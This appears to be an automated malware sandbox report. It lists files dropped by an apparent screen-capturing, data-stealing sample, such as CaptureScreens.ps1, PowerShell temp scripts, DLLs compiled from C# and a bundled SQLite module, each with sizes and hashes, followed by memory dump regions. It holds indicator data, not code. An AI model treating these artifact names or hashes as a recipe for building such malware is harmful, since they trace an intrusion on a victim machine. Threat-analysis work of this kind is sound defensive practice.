b01393a29399d9415c7247bcd309c44487ad8ffacb91fac34900d34a32d01fb5ef21492ae5573457015ee5f598901d85f99f2ba51da40c8b2285ae84bc7c6c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
17103e27657428d243a5ce15b56d6fd3

SHA1
de29bb705e5f2a401651f59e91f5fa8e18f7adec

SHA256
898a545f58f25d6167535c9c52dc8a8ce01434aeb66272fe0d486b7655205329

SHA512
69215e1b35b428f5c09a04310a653edf8f7b7cb252268d8545af7b5ac8e1f7776ccd79fff3b250fc7e4d251ca6d8b91e3a13366a2ad3f3b9aba183c3a1f1e304

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3F2C.tmp

Filesize
1KB

MD5
05df5d360a6fb9fec197cc2602901731

SHA1
56e22db842e963dcaa2e156156a3659e73cca5b0

SHA256
c0394d9e5de15eb50b967618e6a80ee908f2fb4a7a55f0696c4a6df7bc02add2

SHA512
6e89fca807df18cd4087430f90beabf724f8ed3143e7340cfb57184328844e8bd16c0efab97b689981145067839d8dc6e3d3f151e14ce5480cf5edc523e99ddf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4650.tmp

Filesize
1KB

MD5
1454478d676384e9ce429ea03dfebdb3

SHA1
d4dc7c8f4f9afa7e60ab14a66e155543ef74bbc8

SHA256
fad53ae9b0967578a4a1f4d85f94f5923cf08ad165f38236e2627c5986bb1132

SHA512
88f5837cd109ff211d5ac3a87b773fad033f7d65552d92d420510503af9228ce451c684c4373c973c975062d75fff46f695155fdd0f48597b7b9505ecef54996

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l0de1soa.dnc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jng422i3\jng422i3.dll

Filesize
3KB

MD5
8acf38ee2717e37294a56791302640e9

SHA1
2026bd75c7ece18f0f1c3075b05e8c0b647c85a0

SHA256
d7076a648b831f63a9ecce1d55eeff090dd30e20653c96876362e532c5e8cea6

SHA512
07c55a41d1c6172d5b3044e23388c0a62bd412e77185829a64fbdafab42df04402f43083ac5195676952f5a8247df88fc2412681f249bd22f34ff80e7cf2c363

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\tejzmvud\tejzmvud.dll

Filesize
3KB

MD5
8b14039d98efb5cb8d20950843672b2a

SHA1
1ae498cdf79e88cf002b692a8b19b9e6d8a63fdd

SHA256
55ed298eca7efc2cd4f7b4608b771857214ef448d93b22ec2a32351e8dc6c8c8

SHA512
1fe6789230890d4a5402eaeab74fc8b3b393223004ea6883b5ff42388b9fd2ac79878ccf357251167008a335bc623ad581a9c4d565d69340c09c5c6f0b290400

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jng422i3\CSCA2C21E5FF6A6489F9A92C3DF69DBF9F2.TMP

Filesize
652B

MD5
dd75e81044f9f34be1f25ae06e3be081

SHA1
ff89fd78cd46cb33ac7464e27ec94a916861fa5e

SHA256
089f5ec65a2ff57a476fad67e1b77cd2c80882fa2e492519a59b7c5a24a020aa

SHA512
bfa8cffc69540cae4753963ebbc85ad4ca9450beda1ae18ebf7194e7fddd40eb61bc4cd47b09e442702ab5f9d5c2af6484ee6bc14f36d3083f9103d4dab862dc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jng422i3\jng422i3.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jng422i3\jng422i3.cmdline

Filesize
369B

MD5
173009e2f54747a63854f65969d65ab0

SHA1
cdee28c20699865604dad703258d52d952e1f4cd

SHA256
a0d0333447367c7d12f90d365c884162039393e69c803402d7bd2adfcf359c91

SHA512
8dd6d4b141ce3b4b4bac73c61967176d7d36e28821259e18ac0da511d780f0124272c3bc89a8e6b81be19d83c7c967eb24d317d11543531213e93971f1b13411

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tejzmvud\CSC56DE13A0955F4DC0B971F879BA6CCF67.TMP

Filesize
652B

MD5
a511949583e70a69e42ac266afc4f7aa

SHA1
99f38df02195e1f353d882aea1244028aec9aa21

SHA256
bc6084576eb38b0c8bcc87a95ff9146b5c2823ad7ccc566f8f12f5f6b39c7839

SHA512
a0913a7017e805498a9bfaa4c9e44e411bf397ff2d81414aaaf45395fe9620a24f62b10fe9905311b1c2a9d49e1beb08eabd87a65bfc3baf7109bb5451e0b377

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tejzmvud\tejzmvud.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tejzmvud\tejzmvud.cmdline

Filesize
369B

MD5
64a5c4c9227a06bd8be7e0ba1b6a4690

SHA1
9bdd4136795e4f5524476ebe8715e3d793e9e3c6

SHA256
906fcdb4615b28d7de60dd17d9adbc3bcee22bff0a3c5545b838ab81025a2c3b

SHA512
bec9876971ddd7b33976d4b08192f8fe84f12c5d547e316d8117d30ea0ea5063fb0593fc33b5fb0cc22bc6ad83c557a77591711269853011ad27d657d27c9632

Download Submit
memory/112-188-0x0000025C28000000-0x0000025C28008000-memory.dmp

Filesize
32KB

Download
memory/736-115-0x00000218A0780000-0x00000218A07D0000-memory.dmp

Filesize
320KB

Download
memory/3036-86-0x000002544B200000-0x000002544B276000-memory.dmp

Filesize
472KB

Download
memory/3036-85-0x000002544AD90000-0x000002544ADD4000-memory.dmp

Filesize
272KB

Download
memory/3036-84-0x00007FFCEAD10000-0x00007FFCEB7D1000-memory.dmp

Filesize
10.8MB

Download
memory/3036-83-0x00007FFCEAD10000-0x00007FFCEB7D1000-memory.dmp

Filesize
10.8MB

Download
memory/3036-103-0x00007FFCEAD10000-0x00007FFCEB7D1000-memory.dmp

Filesize
10.8MB

Download
memory/3036-73-0x0000025430890000-0x00000254308B2000-memory.dmp

Filesize
136KB

Download
memory/3036-72-0x00007FFCEAD13000-0x00007FFCEAD15000-memory.dmp

Filesize
8KB

Download
memory/3036-99-0x0000025430AB0000-0x0000025430AB8000-memory.dmp

Filesize
32KB

Download